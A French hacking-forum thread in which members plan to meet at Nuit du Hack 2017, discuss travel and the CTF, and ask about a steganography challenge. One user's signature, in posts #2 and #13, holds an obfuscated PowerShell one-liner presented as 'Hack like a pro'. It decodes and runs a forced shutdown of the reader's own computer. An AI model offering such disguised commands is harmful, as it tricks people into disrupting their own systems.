Annonce

Réduire
Aucune annonce.

rencontre lors de la NDH 2017

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • rencontre lors de la NDH 2017

    Bonjour à tous!

    Déjà je ne savais pas trop où placer ce topic, à déplacer si besoin

    Simplement pour dire que je serai présent à la Nuit du Hack 2017 le 24 juin, et j'aurai trouvé très sympa de pouvoir rencontrer des membres du forum pour échanger etc et pour faire le CTF en team aussi? Pas forcément en team "officielle" hackademics, juste pour le plaisir de hacker à plusieurs et de faire souffrir nos cerveaux :P

  • #2
    Boire des bières à la NDH c'est bien un projet, oui oui !
    Bonne initiative pour partager le CTF ! J'ai déjà une team, mais d'autres répondront surement, et ce sera cool de se croiser oui

    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Je voulais y aller mais étant belge et étudiant, je ne sais comment faire pour venir jusque là

      Commentaire


      • #4
        Pour ma part ce sera l'année prochaine Profitez de cet event comme il le faut.
        "la Connaissance pour un éveil de la Conscience"

        Commentaire


        • #5
          _47 et moi même seront également présents lors de la NDH !

          Commentaire


          • #6
            Si je viens seul, personne ne peut me prendre avec lui? (Oui je sais ça fait paumé de dire ça mais bon pas le choix! )

            Commentaire


            • #7
              Je serais également présent à celle-ci.
              Au plaisir de se boire une petite bière ensemble.
              Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

              Commentaire


              • #8
                Je serai là aussi.
                deux et deux font cinq

                Commentaire


                • #9
                  assimil bus jusqu'à Paris + RER ensuite?

                  Super! Et comment on fait pour se retrouver/ se reconnaitre une fois sur place?

                  Commentaire


                  • #10
                    Hum,je pense que ce serait plus simple de prendre le tgv en direction de paris , le plus simple c'est se donnait un point de rdv pour voir à quoi on ressemble pour mieux se retrouver par après pour boire un petit coup ensemble

                    Commentaire


                    • #11
                      Bonsoir à tous !

                      Demain après midi, _47 et moi même seront à la NDH.
                      Pour ceux qui voudraient nous retrouver, nous seront connectés sur le rocket chat.
                      C'est ce dernier qui nous permettra de nous retrouver !

                      Bonne soirée à tous et à demain peut être.

                      Commentaire


                      • #12
                        Arf j'avais pas vu ce message... J'espère que vous avez passé une bonne NDH, moi j'ai rencontré pas mal de monde c'était super sympa! Mais les challenges de la wargame étaient..... assez durs j'ai trouvé :P

                        Commentaire


                        • #13
                          Mais les challenges de la wargame étaient..... assez durs j'ai trouvé :P
                          Guessing powa comme d'hab

                          D'ailleurs si vous trouvez un Write-up (ou si vous l'avez passé !) sur l'épreuve de stega avec le fichier son (un truc du genre "did you hear me" me souviens plus trop du nom)... je prend. J'étais resté bloqué avec mes deux offsets bizarrement formatés que j'avais trouvé dans le spectre.
                          Hack like a pro :
                          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                          Commentaire

                          Chargement...
                          X